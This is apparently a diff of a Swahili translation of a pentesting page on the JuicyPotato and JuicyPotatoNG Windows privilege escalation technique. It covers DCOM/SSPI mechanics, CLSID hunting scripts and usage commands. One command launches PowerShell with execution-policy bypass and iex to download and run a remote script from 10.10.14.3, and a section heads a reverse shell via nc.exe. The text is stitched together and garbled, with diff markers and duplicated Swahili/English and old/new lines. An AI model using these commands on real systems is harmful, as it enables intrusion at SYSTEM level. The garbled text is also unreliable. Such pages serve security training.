From: [http://ohpe.it/juicy-potato/](http://ohpe.it/juicy-potato/)
## JuicyPotatoNG (2022+)
JuicyPotatoNG inarejelea mbinu ya JuicyPotato-style ya local privilege escalation kwenye Windows ya kisasa kwa kuunganisha:
- DCOM OXID resolution kwa local RPC server kwenye port iliyochaguliwa, ikiepuka listener ya zamani iliyowekwa 127.0.0.1:6666.
- SSPI hook ya kushika na kuiga uthibitisho wa SYSTEM unaoingia bila kuhitaji RpcImpersonateClient, ambayo pia inawezesha CreateProcessAsUser wakati SeAssignPrimaryTokenPrivilege peke yake ipo.
- Mbinu za kukidhi vizingiti vya uanzishaji vya DCOM (mf., sharti la zamani la INTERACTIVE-group wakati ukilenga PrintNotify / ActiveX Installer Service classes).
JuicyPotatoNG re-introduces a JuicyPotato-style local privilege escalation on modern Windows by combining:
- Urekebishaji wa DCOM OXID kwa server ya ndani ya RPC kwenye port iliyochaguliwa, ukiepuka listener ya zamani iliyokuwa hardcoded 127.0.0.1:6666.
- Hook ya SSPI ya kunasa na kufanya impersonate authentication ya SYSTEM inayokuja ndani bila kuhitaji RpcImpersonateClient, ambayo pia inawezesha CreateProcessAsUser wakati tu SeAssignPrimaryTokenPrivilege ipo.
- Mbinu za kuridhisha vizingiti vya activation vya DCOM (mfano, sharti la zamani la INTERACTIVE-group wakati unalenga madarasa ya PrintNotify / ActiveX Installer Service).
Important notes (evolving behavior across builds):
- Septemba 2022: Mbinu ya awali ilifanya kazi kwenye malengo ya Windows 10/11 na Server zilizoungwa mkono ikitumia “INTERACTIVE trick”.
- Januari 2023: Sasisho kutoka kwa waandishi: Microsoft baadaye ilizuia INTERACTIVE trick. CLSID tofauti ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7}) inarejesha exploitation lakini tu kwenye Windows 11 / Server 2022 kulingana na chapisho lao.
Vidokezo muhimu (tabia zinazoendelea katika builds):
- September 2022: Initial technique worked on supported Windows 10/11 and Server targets using the “INTERACTIVE trick”.
- January 2023 update from the authors: Microsoft later blocked the INTERACTIVE trick. A different CLSID ({A9819296-E5B3-4E67-8226-5E72CE9E1FB7}) restores exploitation but only on Windows 11 / Server 2022 according to their post.
Matumizi ya msingi (bendera zaidi ziko kwenye msaada):
Basic usage (more flags in the help):
```
JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
# Useful helpers:
@ -103,11 +102,11 @@ JuicyPotatoNG.exe -t * -p "C:\Windows\System32\cmd.exe" -a "/c whoami"
# -s Scan for a COM port not filtered by Windows Defender Firewall
# -i Interactive console (only with CreateProcessAsUser)
```
Ikiwa unalenga Windows 10 1809 / Server 2019 ambapo JuicyPotato ya kawaida imepachikwa, pendelea mbadala zilizo kwenye sehemu ya juu (RoguePotato, PrintSpoofer, EfsPotato/GodPotato, etc.). NG inaweza kuwa ya mazingira kulingana na build na hali ya huduma.
If youre targeting Windows 10 1809 / Server 2019 where classic JuicyPotato is patched, prefer the alternatives linked at the top (RoguePotato, PrintSpoofer, EfsPotato/GodPotato, etc.). NG may be situational depending on build and service state.
## Mifano
Kumbuka: Tembelea [this page](https://ohpe.it/juicy-potato/CLSID/) kwa orodha ya CLSIDs za kujaribu.
Kumbuka: Tembelea [this page](https://ohpe.it/juicy-potato/CLSID/) for a list of CLSIDs to try.
### Pata nc.exe reverse shell
```
@ -126,25 +125,25 @@ c:\Users\Public>
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
```
### Anzisha CMD mpya (ikiwa una ufikiaji wa RDP)
### Anzisha CMD mpya (ikiwa una upatikanaji wa RDP)
![](<../../images/image (300).png>)
## Matatizo ya CLSID
Mara nyingi, CLSID chaguo-msingi ambayo JuicyPotato inatumia **haifanyi kazi** na exploit inashindwa. Kwa kawaida, inahitaji majaribio kadhaa ili kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSID za kujaribu kwa mfumo wa uendeshaji maalum, tembelea ukurasa huu:
Mara nyingi, CLSID ya chaguo-msingi ambayo JuicyPotato inatumia **haifanyi kazi** na exploit inashindwa. Kwa kawaida, inahitaji majaribio kadhaa ili kupata **CLSID inayofanya kazi**. Ili kupata orodha ya CLSIDs za kujaribu kwa mfumo wa uendeshaji maalum, tembelea ukurasa huu:
- [https://ohpe.it/juicy-potato/CLSID/](https://ohpe.it/juicy-potato/CLSID/)
### **Kuangalia CLSIDs**
### **Kukagua CLSIDs**
Kwanza, utahitaji baadhi ya faili za programu mbali na juicypotato.exe.
Kwanza, utahitaji baadhi ya executables mbali na juicypotato.exe.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na uiload kwenye kikao chako cha PS, na pakua na uendeshe [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSID zinazowezekana za kujaribu.
Pakua [Join-Object.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/utils/Join-Object.ps1) na uilete kwenye kikao chako cha PS, kisha pakua na uendeshe [GetCLSID.ps1](https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1). Skripti hiyo itaunda orodha ya CLSIDs zinazowezekana za kujaribu.
Kisha pakua [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(badilisha njia kwa orodha ya CLSID na kwa juicypotato executable) na uiiendeshe. Itaanza kujaribu kila CLSID, na **wakati nambari ya bandari inabadilika, itamaanisha kuwa CLSID ilifanya kazi**.
Kisha pakua [test_clsid.bat ](https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat)(badilisha njia kwa orodha ya CLSID na kwa juicypotato executable) na uendeshe. Itaanza kujaribu kila CLSID, na **wanapobadilika nambari ya bandari, itamaanisha kuwa CLSID ilifanikiwa**.
**Angalia** CLSID zinazofanya kazi **ukitumia parameter -c**
**Angalia** CLSIDs zinazofanya kazi **ukitumia parameter -c**
## Marejeo